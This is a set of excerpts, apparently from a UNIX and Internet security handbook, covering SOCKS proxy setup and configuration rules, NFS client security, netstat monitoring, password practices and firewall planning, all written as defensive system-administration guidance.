   CLIENTS_BIN_DIR       Makefile         Directory containing the SOCKS client programs.

4. Compile SOCKS with a suitable C compiler.

5. Verify that sockd compiled properly and with the correct configuration by running sockd with the -ver option:

   % ./sockd -ver
   CSTC single-homed, stand-alone SOCKS proxy server version 4.2.
   Supports clients that use Rrcmd().
   %

6. Become superuser.

7. Install the SOCKS daemon in the location that you specified in the Makefile; you may be able to do this by typing "make install.server".

8. Add the SOCKS service to your /etc/services file. It should look like this:

   socks 1080/tcp

9. Set up the SOCKS configuration file. See the section called "The SOCKS Server Configuration File: /etc/sockd.conf" below.

10. If you decided to have SOCKS start automatically at system boot time, modify your boot configuration files (either by adding a few lines to /etc/rc.local or by creating a new file in /etc/rc2.d/). You can set up the start-up by adding a few lines that look like this:

    # Start SOCKS server
    if [ -f /usr/etc/sockd ]; then
        (echo -n "sockd... ") >/dev/console
        /usr/etc/sockd >/dev/console 2>&1
    fi

11. If you decided to have SOCKS start from inetd (and you probably don't want to do this), add this line to the /etc/inetd.conf file:

    socks stream tcp nowait nobody /usr/etc/sockd

12. Start the sockd daemon manually, or reset inetd (see the example following this list).

13. Test the system.
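For step 12, the commands look something like the following sketch. The daemon path matches the boot-time example above, the process ID shown is illustrative, and on System V-derived systems you would use ps -ef rather than ps -ax; if sockd does not put itself into the background on your system, append an ampersand (&):

# /usr/etc/sockd
# ps -ax | grep inetd
# kill -HUP 153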

22.4.4 SOCKS and Usernames

SOCKS permits you to allow or deny access to Internet services based on both the IP address and the username of the person on the local network making the request. There are two ways that SOCKS can determine the username of a person on the internal network:

1. Normally, a SOCKS client will send through the username of the person initiating the connection as part of the SOCKS protocol.

2. SOCKS can also use the ident protocol. For more information, see the section "Identification Protocol (auth) (TCP Port 113)" in Chapter 17.

22.4.5 SOCKS Identification Policy

The choice of identification policy is determined by the way in which the sockd program is invoked and by the /etc/sockd.conf configuration file.

Normally, sockd is invoked with one of three options:

sockd [-ver | -i | -I]

These options have the following meanings:

-ver
   Prints the sockd configuration information and exits.

-I
   Forces SOCKS to use the ident protocol. Denies access to any client that is not running the ident protocol. Also denies access to clients for which the username returned by the ident protocol does not match the username provided by the SOCKS protocol.

-i
   Less restrictive than -I. Denies access to clients when the username returned by the ident protocol is different from the username returned by the SOCKS protocol, but allows use of sockd by users who do not have ident running on their systems.

The identification options -i and -I can be overridden by a statement in the SOCKS configuration file, /etc/sockd.conf.

22.4.6 The SOCKS Server Configuration File: /etc/sockd.conf

The sockd configuration file, /etc/sockd.conf, allows you to control which TCP/IP connections are passed by the sockd daemon. As the daemon usually runs on a computer that has access to both your organization's internal network and the Internet, the sockd.conf file controls, in part, which services are passed between the two.

The sockd program doesn't know the difference between your internal and external networks. It simply receives connections, determines the parameters of each connection (username, source, requested destination, and TCP/IP service), then scans the rules in the /etc/sockd.conf file to determine whether the connection should be permitted or denied.

The /etc/sockd.conf file is an ASCII text file. Each line consists of a rule to either allow connections or reject (deny) them. The sockd program scans the file from the first line to the last until a match is found. When a match is found, the action specified by the line is followed.

Lines in the /etc/sockd.conf file may be up to 1023 characters long. Each line has the following form:

[allow | deny] [?=auth] [*=username(s)|filename(s)]
    source-address source-mask
    [destination-address destination-mask]
    [operator destination-port]
    [: shell-command]

Fields are separated by spaces or tabs. If a number sign (#) is found on the line, everything after the number sign is assumed to be a comment, except as noted below.

If an incoming TCP/IP connection does not match any of the lines in the /etc/sockd.conf configuration file, it is rejected.

Here is an explanation of the fields:

allow | deny
   Specifies whether a connection matching the rule on this line should be allowed or denied.

?=auth
   If present, this field allows you to override the identification policy specified when the program was invoked. Specify "?=I" to cause sockd to reject the connection if the user on the client machine is not running ident, or if the name returned by ident is not the same as the username sent by the SOCKS client. Specify "?=i" to cause sockd to reject the connection if the name returned by ident is not the same as the name sent by the SOCKS client.

*=username(s)|filename(s)
   If present, causes the rule to match a particular username. You can also specify a filename, in which case the usernames are read out of the file (one username per line). Here are some examples:

   Username                Result
   *=simsong               Matches the user simsong.
   *=fred,julie            Matches the users fred and julie.
   *=/etc/goodusers        Matches anybody in the file /etc/goodusers.
   *=fred,/etc/goodusers   Matches the user fred and all of the users in the file /etc/goodusers.

source-address source-mask
   The address and mask allow you to specify a match for a single IP address or a range of addresses. The source-address may be either an IP address in the form hhh.iii.jjj.kkk or an Internet hostname; the source-mask must be an IP address mask in the form hhh.iii.jjj.kkk.

   The source-mask specifies which bits of the source-address should be compared with the actual address of the incoming IP connection. Thus, a source-mask of 0.0.0.0 will cause the rule to match any IP address, while a source-mask of 255.255.255.255 will allow only an exact match. These and other possibilities are explored in the table below:

   source-address   source-mask       Result
   18.80.0.1        255.255.255.255   Matches the host 18.80.0.1.
   204.17.190.0     255.255.255.0     Matches any host on the subnet 204.17.190.
   10.80.0.1        255.0.0.0         Matches any host on net 10.
   0.0.0.0          0.0.0.0           Matches every host on the Internet.

operator destination-port
   These optional arguments allow you to specify a particular TCP service or a range of TCP/IP ports. For example, you can specify "le 1023" to select all of the UNIX "privileged" ports, or you can specify "eq 25" to specify the SMTP port. The following table lists all of the operators:

   operator   Meaning
   eq         Equal to
   neq        Not equal to
   lt         Less than
   le         Less than or equal to
   gt         Greater than
   ge         Greater than or equal to

: shell-command
   You can specify a command that will be executed when the line is matched. The command line is executed by the Bourne shell (/bin/sh). Before the line is executed, the following substitutions are made:

   Token   Replaced With
   %A      The fully qualified domain name (FQDN) of the client (the computer contacting sockd), if it can be determined; otherwise, the computer's IP address
   %a      The IP address of the client
   %c      The direction of the connection; replaced with connect if the client is attempting to make an outgoing connection, or bind if the client is waiting for an incoming connection
   %p      The process ID of sockd
   %S      The service name, if it can be determined from the /etc/services database; otherwise, the destination port number
   %s      The destination port number
   %U      The username reported by identd
   %u      The username sent by the client program
   %Z      The FQDN of the destination host, if it can be determined; otherwise, the computer's IP address
   %z      The IP address of the destination computer
   %%      "%"

Obviously, token expansions that require sockd to look up a value in a database (such as %A, %S, and %Z) will take longer to execute than token expansions that merely report an IP address or port number (such as %a, %s, and %z).

This example command runs finger to determine the users on a particular computer, and then sends the results to the root account of the computer that is running sockd:

/usr/ucb/finger @%A | /bin/mailx -s 'SOCKS: rejected %u@%A' root

22.4.6.1 #NO_IDENTD and #BAD_ID

In addition to the pattern matching described above, sockd allows you to specify rules that will match any computer contacting the sockd daemon that is not running the ident protocol, or for which the username returned by the ident protocol is different from the username provided in the initial sockd contact. These lines have the form:

#NO_IDENTD: command
#BAD_ID: command
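For example, assuming that the same token substitutions described above are applied to these commands (an assumption; check the documentation that comes with your sockd), you could have ident mismatches reported to the superuser by mail:

#BAD_ID: echo 'sockd: client claimed %u but identd reported %U from %A' | /bin/mailx -s 'sockd ident mismatch' root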

22.4.6.2 Example /etc/sockd.conf configuration files

Here are some example lines from an /etc/sockd.conf configuration file. The configuration file is designed to protect an organization that has placed a set of UNIX workstations on IP subnet 204.99.90.

deny 204.99.90.0 255.255.255.0 204.99.90.0 255.255.255.0

   This initial rule disallows access to the internal network from internal computers using SOCKS. (Why tie up the SOCKS server if you don't need to?)

allow 0.0.0.0 0.0.0.0 204.99.90.100 255.255.255.255 eq 25

   Allows connections to port 25 (SMTP) of the machine 204.99.90.100. This allows incoming electronic mail to that network.

allow 204.99.90.100 255.255.255.255 0.0.0.0 0.0.0.0 eq 25

   Allows outgoing connections from the machine 204.99.90.100 to port 25 of any computer on the Internet. This rule allows the organization to send mail to outside computers.

allow 204.99.90.0 255.255.255.0 0.0.0.0 0.0.0.0

   Allows outgoing connections from any host on subnet 204.99.90 to any computer on the Internet. If you have this rule, the previous rule is unnecessary.

deny 0.0.0.0 0.0.0.0 204.99.90.255 255.255.255.000 eq 23 : \
    safe_finger @%A |/bin/mailx -s 'Telnet denied from %U/%A' root

   This rather complex rule denies any attempted Telnet login to the organization's internal network. In addition to stopping the logins, it also does a finger of the computer from which the attempt is coming and sends email to the root account of the computer running sockd. If the remote machine is running the ident protocol, the username will be sent as well.

   NOTE: Do not use reverse finger for logging contacts on the finger port (port 79). Otherwise, a loop may result, with two sockd daemons continually attempting to finger each other until they are manually shut down or the disks fill up.

deny 0.0.0.0 0.0.0.0 204.99.90.0 255.255.255.0

   Denies all other connections to the subnet 204.99.90. Strictly speaking, this rule is not necessary, as a connection that does not specifically match the "allow" rules above will be rejected.
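Assembled into a single file, the example rules above would read as follows (nothing new is added here; only the layout is consolidated):

deny  204.99.90.0 255.255.255.0 204.99.90.0 255.255.255.0
allow 0.0.0.0 0.0.0.0 204.99.90.100 255.255.255.255 eq 25
allow 204.99.90.100 255.255.255.255 0.0.0.0 0.0.0.0 eq 25
allow 204.99.90.0 255.255.255.0 0.0.0.0 0.0.0.0
deny  0.0.0.0 0.0.0.0 204.99.90.255 255.255.255.000 eq 23 : \
      safe_finger @%A |/bin/mailx -s 'Telnet denied from %U/%A' root
deny  0.0.0.0 0.0.0.0 204.99.90.0 255.255.255.0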


22.4.7 SOCKS Client Configuration File: /etc/socks.conf

Each client that wishes to use the sockd server must also have its own configuration file. The configuration file has a syntax that is similar to, but slightly different from, the syntax of the /etc/sockd.conf file.

When a SOCKS client attempts to make an outgoing connection to another host on the Internet, or when it calls the Rbind() function to accept an incoming connection, the SOCKS library scans the /etc/socks.conf configuration file line by line, starting with the first line, until it finds a line that matches the requested connection. The library then performs the action that is specified in the file.

Each line in the file can have one of the following forms:

deny [*=username(s)|filename(s)] destination-address destination-mask
    [operator destination-port]
    [: shell-command]

direct [*=username(s)|filename(s)] destination-address destination-mask
    [operator destination-port]
    [: shell-command]

sockd [@=serverlist] [*=username(s)|filename(s)]
    destination-address destination-mask
    [operator destination-port]
    [: shell-command]

Most of these fields are similar to those in the /etc/sockd.conf file. The differences are described below:

deny
   The deny operator specifies that a TCP/IP connection matching the line should be denied. (Remember, even though this rule will prevent the SOCKS package from making a connection to the site in question, the user may still have the option of connecting to the site using a client program that has not been linked with the SOCKS library. Thus, the deny operator running on the client computer is not a substitute for a suitable firewall choke. For more information on firewalls, see Chapter 21, Firewalls.)

direct
   The direct operator tells the SOCKS library that the TCP/IP connection should be sent directly through.

sockd [@=serverlist]
   The sockd operator tells the SOCKS library that the TCP/IP connection should be sent to the sockd daemon, which presumably will then pass it through to the outside network.

   The name of the host that is running the sockd server is compiled into the SOCKS library. It may also be specified on the command line or in the SOCKS_SERVER environment variable, or it may be specified in the /etc/socks.conf configuration file using the @ argument. More than one server may be specified by separating the names with commas, such as:

   sockd @=socks1,socks2,sock3 0.0.0.0 0.0.0.0

In SOCKS version 4.2, the servers are tried in the order in which they appear in the configuration file. Thus, you can specify different servers in different orders on different clients to distribute the load. (A more intelligent approach, though, would be for the servers to be tried in random order.)

22.4.7.1 Example /etc/socks.conf file

This simple configuration file, for an organization administering the subnet 204.90.80, specifies that all connections to the organization's internal subnet should go direct, while all connections to the outside network should go through the SOCKS server:

direct 204.90.80.0 255.255.255.0
sockd @=socks-server 0.0.0.0 0.0.0.0



Chapter 20
NFS

20.3 Client-Side NFS Security

NFS can create security issues for NFS clients as well as servers. Because the files that a client mounts appear in the client's filesystem, an attacker who is able to modify mounted files can directly compromise the client's security.

The primary system that NFS uses for authenticating servers is based on IP host addresses and hostnames. NFS packets are not encrypted or digitally signed in any way. Thus, an attacker can spoof an NFS client either by posing as an NFS server or by changing the data that is en route between a server and the client. In this way, an attacker can force a client machine to run any NFS-mounted executable. In practice, this ability can give the attacker complete control over an NFS client machine.

At mount time, the UNIX mount command allows the client system to specify whether or not SUID files on the remote filesystem will be honored as such. This capability is one of the reasons that the mount command requires superuser privileges to execute. If you provide facilities to allow users to mount their own filesystems (including NFS filesystems as well as filesystems on floppy disks), you should make sure that the facility specifies the nosuid option. Otherwise, users might mount a disk that has a specially prepared SUID program that could cause you some headaches later on.
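For example, on most systems an NFS filesystem can be mounted with SUID handling disabled like this (the server name, export path, and mount point are illustrative, and option syntax varies slightly among UNIX versions):

# mount -o nosuid fileserver:/export/home /home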

NFS can also cause availability and performance issues for client machines. If a client has an NFS partition on a server mounted, and the server becomes unavailable (because it crashed, or because network connectivity is lost), then the client can freeze until the NFS server becomes available. Occasionally, an NFS server will crash and restart and - despite NFS's being a connectionless and stateless protocol - the NFS client's file handles will all become stale. In this case, you may find that it is impossible to unmount the stale NFS filesystem, and your only course of action may be to forcibly restart the client computer.

Here are some guidelines for making NFS clients more reliable and more secure:

● Make sure that your computer is either an NFS server or an NFS client, but not both.
● If possible, do not allow users to log into your NFS server.
● Don't allow your NFS clients to mount NFS servers outside your organization.
● Minimize the number of NFS servers that each client mounts. A system is usually far more reliable and more secure if it mounts two hard disks from a single NFS server, rather than mounting partitions from two NFS servers.
● If possible, disable the honoring of SUID files and devices on mounted partitions.



Appendix F
Organizations

F.2 U.S. Government Organizations

F.2.1 National Institute of Standards and Technology (NIST)

The National Institute of Standards and Technology (formerly the National Bureau of Standards) has been charged with the development of computer security standards and evaluation methods for applications not involving the Department of Defense (DoD). Its efforts include research as well as developing standards.

More information on NIST's activities can be obtained by contacting:

NIST Computer Security Division A-216
Gaithersburg, MD 20899
+1-301-975-3359
http://www.nist.gov

NIST operates the Computer Security Resource Clearinghouse:

http://csrc.ncsl.nist.gov/

NIST also operates the National Technical Information Service, from which you can order a variety of security publications. See Appendix D for details.

F.2.2 National Security Agency (NSA)

One complimentary copy of each volume in the "Rainbow Series" of computer security standards can be obtained from the NSA. The NSA also maintains lists of evaluated and certified products. You can contact them at:

Department of Defense
National Security Agency
ATTN: S332
9800 Savage Road
Fort George Meade, MD 20755-6000
+1-301-766-8729
http://www.nsa.gov:8080

In addition to other services, the NSA operates the National Cryptologic Museum in Maryland. An online museum is located at:

http://www.nsa.gov:8080/museum



Chapter 17
TCP/IP Services

17.5 Monitoring Your Network with netstat

You can use the netstat command to list all of the active and pending TCP/IP connections between your machine and every other machine on the Internet. This command is very important if you suspect that somebody is breaking into your computer or using your computer to break into another one. netstat lets you see which machines your machine is talking to over the network. The command's output includes the host and port number of each end of the connection, as well as the number of bytes in the receive and transmit queues. If a port has a name assigned in the /etc/services file, netstat will print it instead of the port number.

Normally, the netstat command displays UNIX domain sockets in addition to IP sockets. You can restrict the display to IP sockets only by using the -f inet option.

Sample output from the netstat command looks like this:

charon% netstat -f inet
Active Internet connections
Proto Recv-Q Send-Q  Local Address          Foreign Address         (state)
tcp        0      0  CHARON.MIT.EDU.telnet  GHOTI.LCS.MIT.ED.1300   ESTABLISHED
tcp        0      0  CHARON.MIT.EDU.telnet  amway.ch.apollo..4196   ESTABLISHED
tcp     4096      0  CHARON.MIT.EDU.1313    E40-008-7.MIT.ED.telne  ESTABLISHED
tcp        0      0  CHARON.MIT.EDU.1312    MINT.LCS.MIT.EDU.6001   ESTABLISHED
tcp        0      0  CHARON.MIT.EDU.1309    MINT.LCS.MIT.EDU.6001   ESTABLISHED
tcp        0      0  CHARON.MIT.EDU.telnet  MINT.LCS.MIT.EDU.1218   ESTABLISHED
tcp        0      0  CHARON.MIT.EDU.1308    E40-008-7.MIT.ED.telne  ESTABLISHED
tcp        0      0  CHARON.MIT.EDU.login   RING0.MIT.EDU.1023      ESTABLISHED
tcp        0      0  CHARON.MIT.EDU.1030    *.*                     LISTEN

NOTE: The netstat program only displays abridged hostnames, but you can use the -n flag to display the IP address of the foreign machine.

The first two lines of this output indicate Telnet connections between the machines GHOTI.LCS.MIT.EDU and AMWAY.CH.APOLLO.COM and the machine CHARON.MIT.EDU. Both of these connections originated at the remote machine and represent interactive sessions currently being run on CHARON; you can tell this because these ports are greater than 1023 and are connected to the Telnet port. (They may or may not be unnamed.) Likewise, the third Telnet connection, between CHARON and E40-008-7.MIT.EDU, originated at CHARON to the machine E40-008-7. The next two lines are connections to port 6001 (the X Window Server) on MINT.LCS.MIT.EDU. There is a Telnet from MINT to CHARON, one from CHARON to E40-008-7.MIT.EDU, and an rlogin from RINGO.MIT.EDU to CHARON. The last line indicates that a user program running on CHARON is listening for connections on port 1030. If you run netstat on your computer, you are likely to see many connections. If you use the X Window System, you may also see "UNIX domain sockets" that are the local network connections from your X clients to the X Window Server.

With the -a option, netstat will also print a list of all of the TCP and UDP sockets to which programs are listening. Using the -a option will provide you with a list of all the ports that programs and users outside your computer can use to enter the system via the network. (Unfortunately, netstat will not give you the name of the program that is listening on the socket.)[20]

[20] But the lsof command will. See the discussion about lsof in Chapter 25, Denial of Service Attacks and Solutions.

charon% netstat -a -f inet
Active Internet connections
Proto Recv-Q Send-Q  Local Address   Foreign Address  (state)
Previous netstat printout
...
tcp        0      0  *.telnet        *.*              LISTEN
tcp        0      0  *.smtp          *.*              LISTEN
tcp        0      0  *.finger        *.*              LISTEN
tcp        0      0  *.printer       *.*              LISTEN
tcp        0      0  *.time          *.*              LISTEN
tcp        0      0  *.daytime       *.*              LISTEN
tcp        0      0  *.chargen       *.*              LISTEN
tcp        0      0  *.discard       *.*              LISTEN
tcp        0      0  *.echo          *.*              LISTEN
tcp        0      0  *.exec          *.*              LISTEN
tcp        0      0  *.login         *.*              LISTEN
tcp        0      0  *.shell         *.*              LISTEN
tcp        0      0  *.ftp           *.*              LISTEN
udp        0      0  *.time          *.*
udp        0      0  *.daytime       *.*
udp        0      0  *.chargen       *.*
udp        0      0  *.discard       *.*
udp        0      0  *.echo          *.*
udp        0      0  *.ntalk         *.*
udp        0      0  *.talk          *.*
udp        0      0  *.biff          *.*
udp        0      0  *.tftp          *.*
udp        0      0  *.syslog        *.*
charon%
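As footnote [20] notes, the lsof command can tell you which program owns each socket. A brief sketch of its use (lsof's -i option selects Internet sockets; the output format varies between lsof versions):

charon% lsof -i
charon% lsof -i TCP:smtp

The first command lists every open Internet socket along with the owning command and its process ID; the second narrows the listing to the SMTP port shown in the output above.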

NOTE: There are weaknesses in the implementation of network services that can be exploited so that one machine can masquerade temporarily as another machine. There is nothing that you can do to prevent this deception, assuming that the attacker gets the code correct and has access to the network. This kind of "spoof" is not easy to carry out, but toolkits are available to make the process easier. Some forms of spoofing may require physical access to your local network, but others may be done remotely. All require exact timing of events to succeed. Such spoofs are often impossible to spot afterwards.



Chapter 17
TCP/IP Services

17.7 Summary

A network connection lets your computer communicate with the outside world, but it can also permit attackers in the outside world to reach into your computer and do damage. Therefore:

● Decide whether or not the convenience of each Internet service is outweighed by its danger.
● Know all of the services that your computer makes available on the network and remove or disable those that you think are too dangerous.
● Pay specific attention to trap doors and Trojan horses that could compromise your internal network. For example, decide whether or not your users should be allowed to have .rhosts files. If you decide that they should not have such files, delete the files, rename the files, or modify your system software to disable the feature (see the example following this list).
● Educate your users to be suspicious of strangers on the network.
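For instance, a quick way to locate users' .rhosts files before deleting or renaming them is with find. This sketch assumes that home directories live under /home; adjust the path for your site:

# find /home -name .rhosts -print

Once you have the list, you can delete the files or rename them so that they are no longer consulted.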



Chapter 19
19. RPC, NIS, NIS+, and Kerberos

Contents:
Securing Network Services
Sun's Remote Procedure Call (RPC)
Secure RPC (AUTH_DES)
Sun's Network Information Service (NIS)
Sun's NIS+
Kerberos
Other Network Authentication Systems

In the mid-1980s, Sun Microsystems developed a series of network protocols - Remote Procedure Call (RPC), the Network Information System (NIS, previously known as Yellow Pages or YP[1]), and the Network Filesystem (NFS) - that let a network of workstations operate as if they were a single computer system. RPC, NIS, and NFS were largely responsible for Sun's success as a computer manufacturer: they made it possible for every computer user at an organization to enjoy the power and freedom of an individual, dedicated computer system, while reaping the benefits of using a system that was centrally administered.

[1] Sun stopped using the name Yellow Pages when the company discovered that the name was a trademark of British Telecom in Great Britain. Nevertheless, the commands continue to start with the letters "yp."

Sun was not the first company to develop a network-based operating system, nor was Sun's approach technically the most sophisticated. One of the most important features that was missing was security: Sun's RPC and NFS had virtually none, effectively throwing open the resources of a computer system to the whims of the network's users.

Despite this failing (or perhaps because of it), Sun's technology soon became the standard. The University of California at Berkeley soon developed an implementation of RPC, NIS, and NFS that interoperated with Sun's. As UNIX workstations became more popular, other companies, such as HP, Digital, and even IBM, either licensed or adopted Berkeley's software, licensed Sun's, or developed their own.

Over time, Sun developed some fixes for the security problems in RPC and NFS. Meanwhile, a number of other competing and complementary systems - for example, Kerberos and DCE - were developed to solve many of the same problems. As a result, today's system manager has a choice of many different systems for remote procedure calls and configuration management, each with its own trade-offs in terms of performance, ease of administration, and security. This chapter describes the main systems available today and makes a variety of observations on system security. For a full discussion of NFS, see Chapter 20, NFS.

19.1 Securing Network Services

Any system that is designed to provide services over a network needs to have several fundamental capabilities:

● A system for storing information on a network server
● A mechanism for updating the stored information
● A mechanism for distributing the information to other computers on the network

Early systems performed these functions and little else. In a friendly network environment, these are the only capabilities that are needed.

However, in an environment that is potentially hostile, or when an organization's network is connected with an external network that is not under that organization's control, security becomes a concern. To provide some degree of security for network services, the following additional capabilities are required:

● Server authentication. Clients need to have some way of verifying that the server they are communicating with is a valid server.
● Client authentication. Servers need to know that the clients are in fact valid client machines.
● User authentication. There needs to be a mechanism for verifying that the user sitting in front of a client workstation is in fact who the user claims to be.
● Data integrity. A system is required for verifying that the data received over the network has not been modified during its transmission.
● Data confidentiality. A system is required for protecting information sent over the network from eavesdropping.

These capabilities are independent of one another. A system can provide for client authentication and user authentication, but also require that the clients implicitly trust that the servers on the network are, in fact, legitimate servers. A system can provide for authentication of the users and the computers, but send all information without encryption or digital signatures, making it susceptible to modification or monitoring en route.

Obviously, the most secure network systems provide all five network security capabilities.



Chapter 11
Protecting Against Programmed Threats

11.4 Entry

The most important question that arises in our discussion of programmed threats is: How do these threats find their way into your computer system and reproduce? Most back doors, logic bombs, Trojan horses, and bacteria appear on your system because they were written there. Perhaps the biggest security threat to a computer system is its own user group. Users understand the system, know its weaknesses, and know the auditing and control systems that are in place. Legitimate users often have access with sufficient privilege to write and introduce malicious code into the system. Especially ironic, perhaps, is the idea that at many companies the person responsible for security and control is also the person who could cause the most damage if he wished to issue the appropriate commands.

Users also may be unwitting agents of transmission for viruses, worms, and other such threats. They may install new software from outside, and install embedded malicious code at the same time. Software obtained from public domain sources traditionally has been a source of system infection. Not all public domain software is contaminated, of course; most of it is not. Commercial products also have been known to be infected. The real difficulties occur when employees do not understand the potential problems that may result from the introduction of software that has not been checked thoroughly, no matter what its source. This includes software fetched through the "click-and-download" paradigm of WWW browsers.

A third possible method of entry occurs if a machine is connected to a network or some other means of computer-to-computer communication. Programs may be written on the outside and find their way into a machine through these connections. This is the way worms usually enter systems. Worms may carry logic bombs or viruses with them, thus introducing those problems into the computer at the same time.

Programmed threats can easily enter most machines. Environments with poor controls abound, caused in part by the general lack of security training and expertise within the computing community. Few college-level programs in computer science and computer engineering even offer an elective in computer security (or computer ethics), so few computer users - even those with extensive training - have the background to help safeguard their systems.

No matter how the systems initially became infected, the situation is usually made worse when the software spreads throughout all susceptible systems within the same office or plant. Most systems are configured to trust the users, machines, and services in the local environment. Thus, there are even fewer restrictions and restraints in place to prevent the spread of malicious software within a local cluster or network of computers. Because the users of such an environment often share resources (including programs, diskettes, and even workstations), the spread of malicious software within such an environment is hastened considerably. Eradicating malicious software from such an environment is also more difficult because identifying all sources of the problem is almost impossible, as is purging all those locations at the same time.



Chapter 3
Users and Passwords

3.7 One-Time Passwords

The most effective way to minimize the danger of bad passwords is to not use conventional passwords at all. Instead, your site can install software and/or hardware to allow one-time passwords. A one-time password is just that - a password that is used only once.

As a user, you may be given a list of passwords on a printout; each time you use a password, you cross it off the list, and you use the next password on the list the next time you log in. Or you may be given a small card to carry; the card will display a number that changes every minute. Or you may have a small calculator that you carry around. When the computer asks you to log in, it will print a number; you type that number into your little calculator, then type in your personal identification number, and then type to the computer the resulting number that is displayed.

All of these one-time password systems provide an astounding improvement in security over the conventional system. Unfortunately, because they require either the installation of special programs or the purchase of additional hardware, they are not widespread at this time in the UNIX marketplace.

One-time passwords are explained in greater detail in Chapter 8; that chapter also shows some examples of one-time password systems available today.



Chapter 3
Users and Passwords

3.5 Verifying Your New Password

After you have changed your password, try logging into your account with the new password to make sure that you've entered the new password properly. Ideally, you should do this without logging out, so you will have some recourse if you did not change your password properly. This is especially crucial if you are logged in as root and you have just changed the root password.

Forcing a Change of Password

At one major university we know about, it was commonplace for students to change their passwords and then be unable to log into their accounts. Most often this happened when students tried to put control characters into their passwords.[7] Other times, students mistyped the password and were unable to retype it again later. More than a few got so carried away making up a fancy password that they couldn't remember it later.

[7] The control characters ^@, ^G, ^H, ^J, ^M, ^Q, ^S, and ^[ should probably not be put in passwords, because they can be interpreted by the system. If your users will log in using xdm, they should avoid all control characters, as xdm often filters them out. You should also beware of control characters that may interact with your terminal programs, terminal concentrator monitors, and other intermediate systems you may use. Finally, you may wish to avoid the # and @ characters, as some UNIX systems still interpret them as erase and kill characters.
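You can see which characters your own login session currently treats as erase and kill by running stty and looking for the erase and kill entries in its output (the exact output format differs from system to system):

% stty -a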

Well, once a UNIX password is entered, there is no way to decrypt it and recover it. The only recourse is to have someone change the password to another known value. Thus, the students would bring a picture ID to the computing center office, where a staff member would change the password to ChangeMe and instruct them to immediately go down the hall to a terminal room to do exactly that.

Late one semester, shortly after the Internet worm incident, one of the staff decided to try running a password cracker (see Chapter 8) to see how many student account passwords were weak. Much to the surprise of the staff member, dozens of the student accounts had a password of ChangeMe. Furthermore, at least one of the other staff members also had that as a password! The policy soon changed to one in which forgetful students were forced to enter a new password on the spot.

Under SVR4, there is an option to the passwd command that can be used by the superuser: -f (e.g., passwd -f nomemory). This forces the user to change his password during the login process the very next time he logs in to the system. It's a good option for system administrators to remember. (This behavior is the default on AIX. OSF/1 uses the chfn command for this same purpose.)

One way to try out your new password is to use the su command. Normally, the su command is used to switch to another account. But as the command requires that you type the password of the account to which you are switching, you can effectively use the su command to test the password of your own account.

% su nosmis
password: mypassword
%

(Of course, instead of typing nosmis and mypassword, use your own account name and password.)

If you're using a machine that is on a network, you can use the telnet or rlogin programs to loop back through the network and log in a second time by typing:

% telnet localhost
Trying 127.0.0.1...
Connected to localhost
Escape character is '^]'
artemis login: dawn
password: techtalk
Last login: Sun Feb 3 11:48:45 on ttyb
%

You may need to replace localhost in the above example with the name of your computer.

If you try one of the earlier methods and discover that your password is not what you thought it was, you have a definite problem. To change the password to something you do know, you will need the current password. However, you don't know that password! You will need the help of the superuser to fix the situation. (That's why you shouldn't log out - if the time is 2 a.m. on Saturday, you might not be able to reach the superuser until Monday morning, and you might want to get some work done before then.)

The superuser (user root) can't decode the password of any user. However, the superuser can help you when you don't know what you've set your password to by setting your password to something else. If you are running as the superuser, you can set the password of any user, including yourself, without supplying the old password. You do this by supplying the username to the passwd command when you invoke it:

# passwd cindy
New password: NewR-pas
Retype new password: NewR-pas
#



Chapter 3
Users and Passwords

3.8 Summary

In this chapter we've discussed how UNIX identifies users and authenticates their identity at login. We've presented some details on how passwords are represented and used. We'll present more detailed technical information in succeeding chapters on how to protect access to your password files and passwords, but the basic and most important advice for protecting your system can be summarized as follows:

● Use one-time passwords if possible.

Otherwise:

● Ensure that every account has a password.
● Ensure that every user chooses a strong password.
● Don't tell your password to other users.

Remember: even if the world's greatest computer cracker should happen to dial up your machine, if that person is stuck at the login: prompt, the only thing that he or she can do is to guess usernames and passwords, hoping to hit one combination that is correct. Unless the criminal has specifically targeted your computer out of revenge or because of special information that's on your system, the perpetrator is likely to give up and try to break into another machine.

Making sure that users pick good passwords is one of the most important parts of running a secure computer system.



Chapter 21
Firewalls

21.2 Building Your Own Firewall

For years, firewalls were strictly a do-it-yourself affair. A big innovation was the introduction of several firewall toolkits - ready-made proxies and client programs designed to build a simple, straightforward firewall system. Lately, a number of companies have started offering complete firewall "solutions."
Today there are four basic types of firewalls in use:<br />

Packet firewalls<br />

These firewalls are typically built from routers that are programmed to pass some types of packets<br />

and to block others.<br />

Traditional proxy-based firewalls<br />

These firewalls require that users follow special procedures or use special network clients that are<br />

aware of the proxies.<br />

Packet-rewriting firewalls<br />

These firewalls rewrite the contents of the IP packets as they pass between the internal network<br />

and the <strong>Internet</strong>. From the outside, all communications appear to be mediated through a proxy on<br />

the firewall. From the inside network, the firewall is transparent.<br />

Screens<br />

These firewalls bisect a single Ethernet with a pair of Ethernet interfaces. The screen doesn't have<br />

an IP address. Instead, each Ethernet interface listens to all packets that are transmitted on its<br />

segment and forwards the appropriate packets, based on a complex set of rules, to the other<br />

interfaces. Because the screen does not have an IP address, it is highly resistant to attack over the<br />

network. For optimal security, the screen should be programmed through a serial interface or<br />

removable media (e.g., floppy disk), although you can design a screen that would be addressed<br />

through its Ethernet interface directly (speaking a network protocol other than IP). Some<br />

manufacturers of screens provide several network interfaces, so that you can set up a WWW server<br />

or a news server on a separate screened subnet using the same screen.<br />

In this section, we will discuss the construction of a firewall built from a choke and a gate that uses<br />

proxies to move information between the internal network and the external network. We describe how to<br />

build this kind of firewall because the tools are readily available, and because this type seems to provide<br />

adequate security for many applications.<br />


For additional useful and practical information on constructing your own firewall, we recommend that<br />

you read Building <strong>Internet</strong> Firewalls by D. Brent Chapman and Elizabeth D. Zwicky (<strong>O'Reilly</strong> &<br />

Associates, 1995).<br />

21.2.1 Planning Your Configuration<br />

Before you start purchasing equipment or downloading software from the <strong>Internet</strong> for your firewall, you<br />

might first want to answer some basic questions:<br />

● What am I trying to protect? If you are simply trying to protect two or three computers, you might find that using host-based security is easier and more effective than going to the expense and difficulty of building a full-fledged firewall.

● Do I want to build my own firewall, or buy a ready-made solution? Although you could build a very effective firewall, the task is very difficult and one in which a single mistake can lead to disaster.

● Should I buy a monitored firewall service? If your organization lacks the expertise to build its own firewall, or it does not wish to commit the resources to monitor a firewall 24 hours a day, 7 days a week, you may find that paying for a monitored firewall service is an economical alternative. Several ISPs now offer such services as a value-added option to their standard Internet offerings.

● How much money do I want to spend? You can spend a great deal of money on your own systems, or on a commercial product. Often (but not always) the extra expense may result in a more capable firewall.

